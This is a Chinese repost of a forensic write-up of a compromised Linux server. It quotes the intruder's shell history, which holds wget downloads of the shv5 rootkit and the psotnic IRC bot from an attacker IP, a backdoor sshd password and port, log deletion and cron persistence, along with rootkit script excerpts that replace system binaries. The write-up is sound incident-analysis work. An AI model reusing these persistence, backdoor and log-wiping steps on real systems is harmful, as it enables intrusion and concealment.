最近有个朋友让我去帮他看一下他的linux服务器.说是apache启动不了,有很多诡异的情况.后来证明绝不是apache启动不了这么简单.

登上服务器之后随便看了下,最先引起我注意的是”ls”命令的输出:

    lars@server1:~$ lsls: invalid option -- hTry `ls --help' for more information.

为什么”ls”默认加了”-h”参数呢?我用”alias”命令看了一下,然后取消了这个别名之后”ls”就工作正常了.

    lars@server1:~$ alias lsalias ls='ls -sh --color=auto'lars@server1:~$ unalias lslars@server1:~$ lsbackuplars@server1:~$

虽然很奇怪,不过我的首要任务是先把apache启动起来,等过会再仔细研究这个问题.

    lars@server1:~$ sudo /etc/init.d/apache2 startPassword:* Starting apache 2.0 web server...(2): apache2: could not open error log file /var/log/apache2/error.log.Unable to open logs...fail!

纳尼?赶紧去”/var/log/”目录一看,果然”apache2/”文件夹不见了.而且这个目录下其他的文件夹,比如”mysql/”,”samba/”也都不见了.一定是哪里出错了.会不会是我朋友不小心删掉了呢,他跟我说绝对没有.然后我用root登录进去准备修复日志丢失的问题.

    lars@server1:~$ sudo -iPassword:root@server1:~# lsls: unrecognized prefix: dols: unparsable value for LS_COLORS environment variabletotal 444 .                 4 .bashrc           4 .ssh4 ..                4 .lesshst          8 .viminfo8 .bash_history     4 .profile          4 .vimrc

很不幸的发现,”ls”又出问题了.同样,用”alias”命令:

    root@server1:~# alias lsalias ls='ls -sa --color=auto'root@server1:~# unalias lsroot@server1:~# lsroot@server1:~#

这个时候,我才意识到问题的严重性.”ls”奇怪的举动和”/var/log/”大量日志被删除让我怀疑服务器是否被入侵了.当我看到root目录下的”.bash_history”时,就已经可以确定被入侵了.

   

root@server1:~# cat -n .bash_history...340  w341  cd /var342  wget http://83.19.148.250/~matys/pliki/shv5.tar.gz343  tar -zxf shv5.tar.gz344  rm -rf shv5.tar.gz345  mv shv5 .x346  cd .x347  ./setup zibi.joe.149 54098348  passwd349  passwd350  ps aux351  crontab -l352  cat /etc/issue353  cat /etc/passwd354  w355  who356  cd /usr/lib/libsh357  ls358  hide +359  chmod +x hide360  hide +361  ./hide +362  cd /var/.x363  mkdir psotnic364  cd psotnic365  wget http://83.19.148.250/~matys/pliki/psotnic0.2.5.tar.gz366  tar -zxf psotnic0.2.5.tar.gz367  rm -rf psotnic0.2.5.tar.gz368  ls369  mv psotnic-0.2.5-linux-static-ipv6 synscan370  ./synscan371  vi conf372  vi conf1373  mv synscan smbd374  smbd -c conf375  ls376  ps aux377  ls378  ./smbd -c conf379  ./smbd -c conf1380  ./smbd conf381  ./smbd conf1382  ./smbd -a conf conf1383  rm -rf conf.dec384  rm -rf conf1.dec385  cd /usr/lib/libsh386  ./hide +387  exit...425  ssh ftp@62.101.251.166426  w427  ls428  ls429  cd /var/.x430  ls431  cd psotnic/432  ls433  rm -rf /var/log/*434  exit435  ls436  cd /var/.x/psotnic/437  ls438  vi conf2439  ./smbd -c conf2440  ./smbd conf2441  ./smbd -a conf conf1 conf2442  rm -rf conf2.dec443  cd ..444  ls445  cd /usr/lib/libsh446  hide +447  ./hide +448  exit449  ps aux450  cd /var/.x451  ls452  ls453  cd psotnic/454  ls455  cat pid.MastaH456  kill -9 2030457  ./synscan -a conf conf1458  ./smbd -a conf conf1459  cd /usr/lib/libsh460  ./hide +

Woht!这个系统已经被入侵了.这实在是令人激动的一件事情,不过很显然,我的朋友不这么想.这个入侵者犯了一个很基本的错误,没有清除”.bash_history”文件.所以他/她可能在其他的地方也留下了一些蛛丝马迹.接下来就是详细的分析一下这次入侵.

通过bash history我们得到了大量的信息.先来看一下”/var/.x”下面隐藏了什么和命令”setup zibi.joe.149 54098″的作用吧.

   

root@server1:/var/.x# file setupsetup: Bourne-Again shell script text executableroot@server1:/var/.x# wc -l setup825 setuproot@server1:/var/.x# head -17 setup#!/bin/bash## shv5-internal-release# by: PinT[x] April/2003## greetz to:## [*] SH-members: BeSo_M, grass^, toolman, nobody, niceboy, armando99#                 C00L|0, GolDenLord, Spike, zion ...# [*] Alba-Hack : 2Cool, heka, TheMind, ex-THG members ...# [*] SH-friends: mave, AlexTG, Cat|x, klex, JinkS ...# [*] tC-members: eksol, termid, hex, keyhook, maher, tripod etc..# [*] And all others who diserve to be here but i forgot# [*] them at the moment !## PRIVATE ! DO NOT DISTRIBUTE *censored*EZ !

“setup”这个脚本是rootkit shv5的安装脚本.它安装了一个修改过的ssh后门–”/bin/ttyload”,然后把它加到了”/etc/inittab”,这样每次重启后就会自动启动.(相关部分的脚本如下:)

    mv $SSHDIR/sshd /sbin/ttyloadchmod a+xr /sbin/ttyloadchmod o-w /sbin/ttyloadtouch -acmr /bin/ls /sbin/ttyloadchattr +isa /sbin/ttyloadkill -9 `pidof ttyload` >/dev/null 2>&1....# INITTAB SHUFFLINGchattr -isa /etc/inittabcat /etc/inittab |grep -v ttyload|grep -v getty > /tmp/.init1cat /etc/inittab |grep getty > /tmp/.init2echo "# Loading standard ttys" >> /tmp/.init1echo "0:2345:once:/usr/sbin/ttyload" >> /tmp/.init1

它也替换了一些linux的标准命令.

    # Backdoor ps/top/du/ls/netstat/etc..cd $BASEDIR/binBACKUP=/usr/lib/libsh/.backupmkdir $BACKUP...# ls ...chattr -isa /bin/lscp /bin/ls $BACKUPmv -f ls /bin/lschattr +isa /bin/ls

这样子就可以解释为什么”ls”命令输出那么奇怪了.

“.backup”文件夹保存了被替换之前的命令程序.

    root@server1:/var/.x# ls -l /usr/lib/libsh/.backup/total 552-rwxr-xr-x   1 root     root       126276 Dec 24 22:58 find-rwxr-xr-x   1 root     root        59012 Dec 24 22:58 ifconfig-rwxr-xr-x   1 root     root        77832 Dec 24 22:58 ls-rwxr-xr-x   1 root     root        30388 Dec 24 22:58 md5sum-rwxr-xr-x   1 root     root        99456 Dec 24 22:58 netstat-rwxr-xr-x   1 root     root        65492 Dec 24 22:58 ps-rwxr-xr-x   1 root     root        14016 Dec 24 22:58 pstree-rwxr-xr-x   1 root     root        50180 Dec 24 22:58 top

看了一下时间戳,居然是在圣诞节.

很显然,原始的”ls”和后门安装的”ls”是不一样的.他们的md5对比如下:

    root@server1:~# md5sum /usr/lib/libsh/.backup/ls /bin/lseef7ca9dd6be1cc53bac84012f8d1675  /usr/lib/libsh/.backup/ls0a07cf554c1a74ad974416f60916b78d  /bin/lsroot@server1:~# file /bin/ls/bin/ls: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.0.0, dynamically linked(uses shared libs), for GNU/Linux 2.0.0, strippedroot@server1:~# file /usr/lib/libsh/.backup/ls/usr/lib/libsh/.backup/ls: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.6.0, dynamically linked(uses shared libs), for GNU/Linux 2.6.0, stripped

这个rootkit(“sh5.tar.gz”)是从下面的地址下载的.

    root@server1:~# dig +short -x 83.19.148.2504lo.bydg.pl.

这是一个波兰的ip,从这个ip上没有得到更多的信息.不过这个入侵者依然犯了几个严重的错误.

这是运行”setup”命令的截图:(在服务器上的沙盒里运行的)

所以”zibi.joe.149″是后门的密码,”54098″是端口号.这是一个来自ssh.com的就版本的sshd.测试截图如下:

安装完后门之后,下一个步骤就是装一个irc-bot,让服务器变成僵尸网络中的一员.”psotnic0.2.5.tar.gz”就是来达到这个目的的.入侵者解压这个包之后把 irc-bot重命名为”smbd”,来达到隐藏的目的.

然后,他创建了两个配置文件.文件中包含irc服务器和需要加入的频道.配置文件是加密过的,而且明文的配置文件被删掉了.

    371  vi conf372  vi conf1....378  ./smbd -c conf379  ./smbd -c conf1380  ./smbd conf381  ./smbd conf1382  ./smbd -a conf conf1

让我们执行一下382这条命令,看看会发生什么.

    root@server1:/var/.x/psotnic# ./smbd -a conf conf1Psotnic C++ edition, version 0.2.5-ipv6 (Jul 17 2005 20:39:49)Copyright (C) 2003-2005 Grzegorz Rusin[+] Adding: */10 * * * * cd /var/.x/psotnic; ./smbd conf >/dev/null 2>&1[+] Adding: */10 * * * * cd /var/.x/psotnic; ./smbd conf1 >/dev/null 2>&1[+] Added 2 psotnics to cron

哇!它添加了cron定时任务.赶紧看一看:

 

   root@server1:/var/.x/psotnic# crontab -l*/10 * * * * cd /var/.x/psotnic; ./smbd conf >/dev/null 2>&1*/10 * * * * cd /var/.x/psotnic; ./smbd conf1 >/dev/null 2>&1

接下来,我杀掉这两个恶意的smbd进程,禁用cron任务.在另一个shell中运行了tcpdump,然后手动启动了这两个irc-bot进程:

    root@server1:~# cd /var/.x/psotnic; ./smbd confPsotnic C++ edition, version 0.2.5-ipv6 (Jul 17 2005 20:39:49)Copyright (C) 2003-2005 Grzegorz Rusin[*] Acting as LEAF[+] Config loaded[+] Going into background [pid: 5724]root@server1:/var/.x/psotnic# ./smbd conf1Psotnic C++ edition, version 0.2.5-ipv6 (Jul 17 2005 20:39:49)Copyright (C) 2003-2005 Grzegorz Rusin[*] Acting as LEAF[+] Config loaded[+] Going into background [pid: 5727]root@server1:/var/.x/psotnic#

用”ps”命令(后门替换过的)可以看到这两个进程.这也是为什么入侵者需要通过改名字来隐藏进程.

    root@server1:/var/.x/psotnic# ps axuw | grep smbroot      3799  0.0  0.4  8592 2156 ?        S    11:00   0:00 /usr/sbin/smbd -Droot      3808  0.0  0.1  8592  896 ?        S    11:00   0:00 /usr/sbin/smbd -Droot      5724  0.0  0.1  1648  772 pts/2    S    12:47   0:00 ./smbd confroot      5727  0.0  0.1  1640  764 pts/2    S    12:47   0:00 ./smbd conf1

最开始两个是真正的samba进程,后面两个是irc-bot,让我们用”strace”命令来看看它做了什么:

    root@server1:~# strace -p 5727...connect(3, {sa_family=AF_INET, sin_port=htons(9714), sin_addr=inet_addr("83.18.74.235")}, 16) = -1 EINPROGRESS (Operation now in progress)...connect(4, {sa_family=AF_INET, sin_port=htons(6667), sin_addr=inet_addr("195.159.0.92")}, 16) = -1 EINPROGRESS (Operation now in progress)

可以看到它尝试连接ip 83.18.74.235的9714端口和195.159.0.92的6667端口:

 

    root@server1:~# dig +short -x 83.18.74.235manhattan.na.pl.root@server1:~# dig +short -x 195.159.0.92ircnet.irc.powertech.no.

又是一个波兰的ip.另外一个ip,”ircnet.irc.powertech.no”是”irc.powertech.nof”的别名.是挪威一个著名的irc服务器.

tcpdump抓到了连接irc服务器的流量.正如下面的内容显示,它连接到了”irc.powertech.no”,加入了”#aik”频道.

    :irc.powertech.no 001 578PAB9NB :Welcome to the Internet Relay Network 578PAB9NB!~op@ti231210a080-3666.bb.online.no:irc.powertech.no 002 578PAB9NB :Your host is irc.powertech.no, running version 2.11.1p1:578PAB9NB!~op@ti231210a080-3666.bb.online.no JOIN :#aik:irc.powertech.no 353 578PAB9NB @ #aik :578PAB9NB kknd raider brandyz jpi conf xerkoz IpaL vvo:irc.powertech.no 366 578PAB9NB #aik :End of NAMES list.:irc.powertech.no 352 578PAB9NB #aik ~op ti231210a080-3666.bb.online.no irc.powertech.no 578PAB9NB G :0 op - GTW:irc.powertech.no 352 578PAB9NB #aik ~kknd ti231210a080-3666.bb.online.no irc.hitos.no kknd H :2 kknd - GTW:irc.powertech.no 352 578PAB9NB #aik ~raider mobitech-70.max-bc.spb.ru *.dotsrc.org raider G :4 raider - GTW:irc.powertech.no 352 578PAB9NB #aik ~brandyz mobitech-70.max-bc.spb.ru *.dotsrc.org brandyz G :4 brandyz - GTW:irc.powertech.no 352 578PAB9NB #aik ~jpi p3124-ipad309sasajima.aichi.ocn.ne.jp *.jp jpi G :8 jpi - GTW:irc.powertech.no 352 578PAB9NB #aik ~conf p3124-ipad309sasajima.aichi.ocn.ne.jp *.jp conf G :7 conf - GTW:irc.powertech.no 352 578PAB9NB #aik ~xerkoz p3124-ipad309sasajima.aichi.ocn.ne.jp *.jp xerkoz H :7 xerkoz - GTW:irc.powertech.no 352 578PAB9NB #aik lm campus19.panorama.sth.ac.at *.at IpaL H :5 .LaPi.9@.IRCNet..:irc.powertech.no 352 578PAB9NB #aik ~vvo ppp86-7.intelcom.sm *.tiscali.it vvo H :6 vvo - GTW:irc.powertech.no 315 578PAB9NB #aik :End of WHO list.这些仅仅是加入#aik频道,并开始监听该频道所有成员的一些原始网络流量.我决定自己进入这个频道看看.令我惊讶的是不需要任何密码我就进来了.17:43 -!- viper42 [~viper42@trinity.gnist.org] has joined #aik17:43 [Users #aik]17:43 [ 578PAB9NL] [ conf] [ jpi ] [ raider ] [ vvo   ]17:43 [ brandyz  ] [ IpaL] [ kknd] [ viper42] [ xerkoz]17:43 -!- Irssi: #aik: Total of 10 nicks [0 ops, 0 halfops, 0 voices, 10 normal]17:43 -!- Irssi: Join to #aik was synced in 1 secs

我发现我朋友的服务器使用的昵称是”578PQB9NB”,还有一些其他的服务器也在这里.这些僵尸服务器应该是正在等待着我们的入侵者加入频道发布命令.或者他已经潜藏在这里了.我注意到,所有的昵称都有一个后缀”\*-GTW”,只有一个没有:

    17:45 [powertech] -!- IpaL [lm@campus19.panorama.sth.ac.at]17:45 [powertech] -!-  ircname  : LaPi@IRCNet17:45 [powertech] -!-  channels : #relaks #ping @#seks #aik @#ogame.pl#pingwinaria #hattrick #trade #admin @#!sh17:45 [powertech] -!-  server   : *.at [\o\  \o/  /o/]

这是唯一一个加入了多个频道的昵称.我猜我已经找到这个入侵者了,除非这是一个故意迷惑的诱饵.(恩,这个入侵者真的真么笨!!这么容易就找到了!?).我决定等几天看看有木有什么有趣的事情发生.这个域名解析到了:

    $ dig +short campus19.panorama.sth.ac.at193.170.51.84

根据RIPE的数据,这个ip属于Vienna University计算机中心,我发了一封邮件询问关于这个域名的信息,他们几个小时后会我了:

    From: Alexander Talos via RTTo: larstra@ifi.uio.noSubject: Cracker at campus19.panorama.sth.ac.at (193.170.51.84)  [ACOnet CERT #38603]Date: Fri, 18 May 2007 18:22:43 +0200 (CEST)Reply-To: cert@aco.net-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA1Hej!On Fri May 18 14:45:03 2007, larstra@ifi.uio.no wrote:> I have been tracking down cracker which connected from> campus19.panorama.sth.ac.at (193.170.51.84). The user, whichOuch. panorama.sth.ac.at is a dormitory with about 4k rooms allbehind a NAT gateway - it will be very hard to get hold of themiscreant.This incident will, in the long run, definitely help me gettingrid of the NAT boxes in setups like that, but right now, we willhave to make do with what we have.> Please investigate the host in question. Perhaps is this a> compromised host on your network acting as a jumpstation forSure, and even in a NATed environment, this is still possible.Btw, you did a great job in analysing the compromised machine!I'll let you know when I have either further questions or anyinteresting results.Cheers,Alexander Talos- --IT-Security, Universitaet Wien, ACOnet CERTT: +43-1-4277-14351  M: +43-664-60277-14351

看起来我不够幸运.

接下来我曾尝试连接irc频道里其他僵尸主机的 54098端口,可惜都失败了.看来其他的僵尸主机的后门可能使用的是别的端口.

连接到”83.18.74.235″的流量看起来很混乱.只好再次用strace命令:

    root@server1:/var/.x/psotnic# strace -f ./smbd conf1 &> /root/dump.strace

跟预期的一样,有很多输出,其中一个是它尝试启动”BitchX”,这是一个irc客户端.但是失败了,因为BitchX没有安装:

    [pid  7537] write(2, "sh: ", 4)         = 4[pid  7537] write(2, "BitchX: not found", 17) = 17[pid  7537] write(2, "n", 1)           = 1[pid  7537] close(2)                    = 0

下面的截图是tcpdump抓到流量的一部分:

这仅仅是两个假的smbd进程中的一个.另外一个也连到了两个irc服务器,一个是波兰这个,另外一个是”irc.hitos.no”,位于挪威的特罗姆斯郡.

入侵者除了这些,还运行了一个叫”hide”的脚本来清除日志:

    root@server1:/usr/lib/libsh# ./hide +Linux Hider v2.0 by maveenhanced by me![+] [Shkupi Logcleaner] Removing + from the logs........ .[+] /var/log/messages  ... [done][+] /var/run/utmp      ... [done][+] /var/log/lastlog   ... [done][+] /var/log/wtmp      ... [done]* m i s s i o n  a c c o m p l i s h e d *p.h.e.e.r  S.H.c.r.e.w

那么这个入侵者为什么还要把”/var/log/”目录全删除了呢,是不相信这个工具么?还是他特别害怕?

可以看到这个服务器被入侵了,安装了后门而且加入了僵尸网咯.但是入侵者犯了几个错误导致他可能被侦查到:

1, 忘记清除”.bash_history”文件

2, “/var/log”目录下所有文件都删除了.导致某些程序无法启动.很容易被发现.

3, 修改了root的密码.又是一个愚蠢的行为.永远不要修改root密码,这个必然会引起管理员的注意.

4, irc的频道没有密码保护.虽然即使有密码,我们也可以抓包分析出来.

5, 入侵者平时就在僵尸网络的频道闲逛?如果是这样的话那他已经暴露了.

当然还有几个遗留的问题:

1,”ssh ftp@62.101.251.166″ 这个命令是干嘛的.是入侵者不小心敲错了么还是有其他的目的?

      $ dig +short -x 62.101.251.166cA6FB653E.dhcp.bluecom.no.

2,跟83.18.74.235(manhattan.na.pl)的通讯内容是什么?

3,最重要的问题是他一开始是如何或得下系统的权限的?这个服务器运行的是Ubuntu 6.06 LTS,打了最新的补丁.可能入侵的途径:

*猜测root密码,不幸的是这个密码是强密码*

*未知的exploit*

*某个用户在已经被攻陷的主机上登录这台服务器.入侵者嗅探到了密码.*

原文地址

收藏该文
litdg

litdg37篇文章等级:6

FB作者

这些评论亮了

  • xxx 回复
    2007年4月9日。。。。。。。,这-。-!!!!!!!!!!
    )24( 亮了
  • xt9 回复
    一个普通的web蠕虫+IRC木马 而已。
    据老衲的经验 十之八九 是 IRC木马 自动攻击了你朋友的web服务器,通过蠕虫的web漏洞攻击插件,获得了权限,提权,下载安装木马,然后你朋友服务器就成了这僵尸网络中一个普普通通的 肉鸡。
    文中提及的诸多入侵者的纰漏都是因为 自动脚本完成的,所以没那么精致。
    )15( 亮了
  • 河蟹 回复
    我国外的小弟做的
    )12( 亮了
  • xt9 回复
    @litdg 
    )12( 亮了
  • litdg (6级)FB作者回复
    @xt9 长见识了啊。不知道能否约个稿,在fb写文介绍一下相关技术。
    )12( 亮了
发表评论

已有 28 条评论

  • 园长MM  (1级)  2013-09-11 回复 1楼

    路过

    亮了(5)
  • whitemonty  (4级) 这家伙很懒,就是不肯写个人说明!  2013-09-11 回复 2楼

    欢迎收看黑客追踪第一季

    亮了(10)
  • xt9  2013-09-11 回复 3楼

    一个普通的web蠕虫+IRC木马 而已。
    据老衲的经验 十之八九 是 IRC木马 自动攻击了你朋友的web服务器,通过蠕虫的web漏洞攻击插件,获得了权限,提权,下载安装木马,然后你朋友服务器就成了这僵尸网络中一个普普通通的 肉鸡。

    文中提及的诸多入侵者的纰漏都是因为 自动脚本完成的,所以没那么精致。

    亮了(15)
    • litdg  (6级) FB作者  2013-09-11 回复

      @xt9 虽然没看懂。但是感觉很高端的样子

      亮了(3)
      • xt9  2013-09-11 回复

        @litdg 

        亮了(12)
      • xt9  2013-09-11 回复

        @xt9 baidu又搞防外链…

        亮了(3)
      • litdg  (6级) FB作者  2013-09-11 回复

        @xt9 长见识了啊。不知道能否约个稿,在fb写文介绍一下相关技术。

        亮了(12)
  • 河蟹  2013-09-11 回复 4楼

    我国外的小弟做的

    亮了(12)
  • softbug  (7级) 四川建设网安全工程师  2013-09-11 回复 5楼

    好久没看到过入侵分析的文章了。而且是真实案例

    亮了(3)
  • Rozero  (4级) 酱油桑  2013-09-11 回复 6楼

    比较弱智的小骇客的行为,对比足迹也没做任何处理,说明是自动化完成的。

    亮了(1)
    • xxx  2013-09-11 回复

      @Rozero  这个不能叫弱智,人家是botnat,讲的是数量。这种粗暴的破坏原有系统,不做任何痕迹清理,显然是被批量抓鸡了

      亮了(3)
      • Rozero  (4级) 酱油桑  2013-09-11 回复

        @xxx
        嗯,是自动化行为,所以隐藏的比较粗糙,刚去分析了下这个shv5的rootkit,这个rootkit本身做的也比较粗糙,是基于替换文件的方式来完成的,并且也没做端口隐藏,通过strace一览无余。。
        推荐有兴趣的朋友可以去分析下adore-ng这个rootkit,这个rootkit做的比较精致,知其然知其所以然,可好好了解下设计原理,更容易从设计角度来分析。

        亮了(1)
      • litdg  (6级) FB作者  2013-09-11 回复

        @Rozero  恩。我也是分析shv5的时候发现的这文章。感谢回复。希望可以多多交流。

        亮了(1)
  • xxx  2013-09-11 回复 7楼

    2007年4月9日。。。。。。。,这-。-!!!!!!!!!!

    亮了(24)
    • litdg  (6级) FB作者  2013-09-11 回复

      @xxx 我也来亮一个

      亮了(1)
    • 暴龙哥  2013-09-11 回复

      @xxx 虽然是几年前的文章,但是的确是个好东西。
      也许大家都一头扎进了APT,但是这个分析案例也不失为一个攻守学习的经典案例啊。

      亮了(2)
      • litdg  (6级) FB作者  2013-09-11 回复

        @暴龙哥 你懂我!!!感谢

        亮了(1)
  • Draycen  (1级)  2013-09-11 回复 8楼

    :cool: 路过

    亮了(1)
  • 河蟹  2013-09-11 回复 9楼

    Holiday cracking Monday, 09 April 2007

    亮了(1)
  • 逝情  (1级) 我的拳头和下体只为你硬,你的眼泪和下体也只能为我湿润~  2013-09-11 回复 10楼

    似乎,很高端的样子。

    亮了(1)
  • p0tt1  (6级) 黑客叔叔,RainRaid和SniFFeR.Pro团队负责人  2013-09-11 回复 11楼

    其实老外也有批量抓鸡的~但是按照楼主描述的安全配置的强度 不像能被抓到的~

    亮了(1)
  • _Tue韜  2013-09-11 回复 12楼

    亮了(0)
  • 唐门三少_tang3  2013-09-11 回复 13楼

    有点意思

    亮了(0)
  • 坏水  2013-09-11 回复 14楼

    好好学习为党国效力

    亮了(0)
  • xxoo  2013-09-12 回复 15楼

    jboss /tomcat 等都有蠕虫吧~~~

    亮了(2)
  • Leo-o  (1级)  2013-09-12 回复 16楼

    Mark , 涨姿势了。

    亮了(1)
  • 心在想念  (2级)  2013-09-13 回复 17楼

    高端。。。。。。。。。。。。。。

    亮了(1)
  • chaplin  (1级)  2013-11-29 回复 18楼

    这个分析文章很好、长知识了。

查看全文
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

相关文章

  1. 《A Self-Attention Setentence Embedding》阅读笔记及实践

    算法原理本文利用self-attention的方式去学习句子的embedding,表示为二维矩阵,而不是一个向量,矩阵中的每一行都表示句子中的不同部分。模型中使用了self-attention机制和一个特殊的regularization term。 假设我们有一个句子S" role="presentation" style=&…...

    2024/5/8 17:19:05
  2. react学习笔记(一)搭建环境+整体学习

    找着工作了好像。公司是用react的,所以现在开始赶紧学点react。 截图参考来自下两个网站: 千峰培训的教程视频 https://www.bilibili.com/video/BV1eE411W7WT?p=2 react官网教程: 官网教程中最终会做一个井字棋的demo出来。也就是我们要完成的。 https://react.docschina.o…...

    2024/5/8 17:08:02
  3. Android中商品展示案例

    开发一个简单的购物车:(1)需要将购物车中的商品以列表的形式展示(2)并且还需要对购物车中的 商品进行增删改查操作。(3)要实现这些功能就需要使用 ListView 和 SQLite 数据库。 1.创建一个名为ProdectDisplay的程序2.(1)在activity_main.xml文件中设计布局:<?xm…...

    2024/5/8 22:17:47
  4. Flask-Restful详解

    Restful API规范restful api是用于在前端与后台进行通信的一套规范。使用这个规范可以让前后端开发变得更加轻松。以下将讨论这套规范的一些设计细节。协议:采用http或者https协议。数据传输格式:数据之间传输的格式应该都使用json,而不使用xml。url链接:url链接中,不能有…...

    2024/5/8 20:22:24
  5. 图书管理系统——创建菜单栏(使用JMenuBar创建菜单栏)

    编写菜单栏,方法——初始化JMenuBar类对象,创建顶层菜单。JMenuBar public JMenuBar() 创建新的菜单栏。 例如:JMenu readerMangerMItem = new JMenu("读者信息管理");主要使用的属性有 1.首先创建类:属性:JMenu——readerManagerMItem("读者信息管理"…...

    2024/5/9 3:11:57
  6. 我是如何在SQL Server中处理每天四亿三千万记录的

    首先声明,我只是个程序员,不是专业的DBA,以下这篇文章是从一个问题的解决过程去写的,而不是一开始就给大家一个正确的结果,如果文中有不对的地方,请各位数据库大牛给予指正,以便我能够更好的处理此次业务。 项目背景 这是给某数据中心做的一个项目,项目难度之大令人发…...

    2024/5/8 17:29:41
  7. 用顺序表实现图书管理系统 数据结构作业

    /*Author:SkysysSchool:NCEPU */ #include<bits/stdc++.h> using namespace std; ////////BASIC INFO////////// #define ISBN_LENGTH 13 #define NAME_LENGTH 20 #define PRESS_LENGTH 20 #define AUTHOR_LENGTH 20 typedef struct...

    2024/5/8 21:26:14
  8. Struts2 OGNL 漏洞!

    2019独角兽企业重金招聘Python工程师标准>>> 这文章有漏洞影响到百度,所以先发百度,修补后,正在和剑心商量小范围群发各个互联网安全团队,结果老外也研究出,并且直接爆出这个文章的最终POC。想想刚好明天我生日,发了,庆祝吧。身在互联网公司安全团队,有研究…...

    2024/5/8 13:11:51
  9. tf.nn.embedding_lookup()的用法

    一般在NLP中经常用到这个函数。在NLP中,词汇表中存储了所有单词的word embedding,这个词汇表中的word embedding可以是通过word2vec算法训练好的,但是我们的语料库中的文本都是按照一篇篇文档存储的,而且语料库中存储的也只是一篇篇文档的对应单词的id,而不是embedding。故…...

    2024/5/9 6:40:24
  10. android动画案例,淡入淡出效果

    转载请注明出处:http://blog.csdn.net/droyon/article/details/8689249 源代码下载 1、android动画测试程序,界面如图: 颜色随机变化,点击视图,左淡出,右淡入,下淡出,上淡入效果。主要源代码解析:package com.example.objectanimatortest;import java.util.Random;imp…...

    2024/4/17 2:26:59
  11. WEB前端HTML5,CSS3,VueJS,AngularJS,NodeJS,ReactJS,响应式开发,组件式开发,全栈架构

    WEB前端HTML5,CSS3,VueJS,AngularJS,NodeJS,ReactJS,Bootstrap,Webpack,响应式开发,组件式开发,全栈架构,高级项目,实战42套WEB前端包含:HTML5,CSS3,VueJS,AngularJS,NodeJS,ReactJS,Bootstrap,Webpack,Ajax,JQuery,WepApp,Yii2.0,ES6,Laravel5.4,响…...

    2024/4/19 21:33:54
  12. 理解RESTful架构 Restful API设计指南

    理解RESTful架构Restful API设计指南 理解RESTful架构越来越多的人开始意识到,网站即软件,而且是一种新型的软件。这种"互联网软件"采用客户端/服务器模式,建立在分布式体系上,通过互联网通信,具有高延时(high latency)、高并发等特点。网站开发,完全可以采…...

    2024/4/3 15:07:18
  13. 数据结构中的校园导航系统---c语言

    本程序分别实现了管理员和游客的功能,管理员和游客通过对文件的操作进行注册登录从而进入系统,系统实现了景点的增删改查的功能,并能找到任意俩个景点的最短距离。 本文涉及到迪杰斯特拉算法,应用迪杰斯特拉算法找到俩个景点的最短距离。图的存储是使用的邻接矩阵的存储形式…...

    2024/5/9 4:08:27
  14. RESTful API规范详解

    restful其实就是一套编写接口的协议,协议规定如何编写以及如何设置返回值、状态码等信息。 RESTful API就是REST风格的API。 那么在什么场景下使用RESTful API呢? 在当今的互联网应用的前端展示媒介很丰富。有手机、有平板电脑还有PC以及其他的展示媒介。那么这些前端接收到的…...

    2024/5/7 1:07:45
  15. 如何通过ReactJS和Firebase使用电子邮件自动化构建新闻通讯应用程序

    NB:我看到我的草稿中已有将近两年的教程,所以我决定将其发布。 在本教程中,我将构建一个简单的react Js应用程序,该应用程序在注册成功后处理新闻通讯注册和自动邮寄。 React世界的新手可以将本教程作为辅助项目来查找,以帮助您更好地了解React。 享受学习!!! ##要求…...

    2024/4/17 2:28:23
  16. Android高手进阶教程(八)之----Android Widget开发案例(世界杯倒计时!)

    今天我们要写一下Android Widget的开发,由于快点凌晨,我就不说的太具体了,同志们就模仿吧!首先看一下效果图:下面是Demo的详细步骤:一、新建一个Android工程命名为:WidgetDemo.二、准备素材,一个是Widget的图标,一个是Widget的背景。存放目录如下图:三、修改string.xml文…...

    2024/4/17 2:27:53
  17. Keras Embedding层详解

    Keras Embedding层详解请注意,以下内容对应 Keras2.0 版本,并且所有内容都可以在这里找到。值得注意的是,Embedding层只能作为模型的第一层。函数原型def keras.layers.Embedding(input_dim, output_dim, embeddings_initializer=uniform, embeddings_regularizer=None, act…...

    2024/4/19 22:27:25
  18. 瑞星本地提权ODAY漏洞 通杀09 2010

    前言:波兰一家安全组织(www.ntinternals.org)近日公布:瑞星杀毒软件长期存在两个“本地提权”0day安全漏洞,使木马病毒能轻易获得 瑞星用户的系统控制权。国内安全厂商金山和360的技术专家均已确认了这两个漏洞的存在,一旦受到黑客攻击,数千万瑞星用户将丧失对木马病毒的…...

    2024/5/6 22:05:53
  19. 词向量与Embedding之间的关系?

    词向量,英文名叫Word Embedding,按照字面意思,应该是词嵌入。说到词向量,不少读者应该会立马想到Google出品的Word2Vec,大牌效应就是不一样。另外,用Keras之类的框架还有一个Embedding层,也说是将词ID映射为向量。由于先入为主的意识,大家可能就会将词向量跟Word2Ve…...

    2024/5/7 2:35:22
  20. React + webpack 开发单页面应用简明中文文档教程(八)Link 跳转以及编写内容页面

    React + webpack 开发单页面应用简明中文文档教程(八)Link 跳转以及编写内容页面React 入门系列教程导航React + webpack 开发单页面应用简明中文文档教程(一)一些基础概念 React + webpack 开发单页面应用简明中文文档教程(二)创建项目 React + webpack 开发单页面应用…...

    2024/4/17 2:28:05

最新文章

  1. Chapter 1-19. Introduction to Congestion in Storage Networks

    Q: What effects does NVMe over Fabrics have on network congestion? All environments are different; hence a general answer is not possible. 所有的环境都是不同的,因此不可能给出一个笼统的答案。 The high amount of parallelism of NVMe may increase network u…...

    2024/5/9 7:18:22
  2. 梯度消失和梯度爆炸的一些处理方法

    在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言&#xff0c;在此感激不尽。 权重和梯度的更新公式如下&#xff1a; w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...

    2024/5/7 10:36:02
  3. Web大并发集群部署之集群介绍

    一、传统web访问模型 传统web访问模型完成一次请求的步骤 1&#xff09;用户发起请求 2&#xff09;服务器接受请求 3&#xff09;服务器处理请求&#xff08;压力最大&#xff09; 4&#xff09;服务器响应请求 传统模型缺点 单点故障&#xff1b; 单台服务器资源有限&…...

    2024/5/8 17:15:55
  4. python爬取B站视频

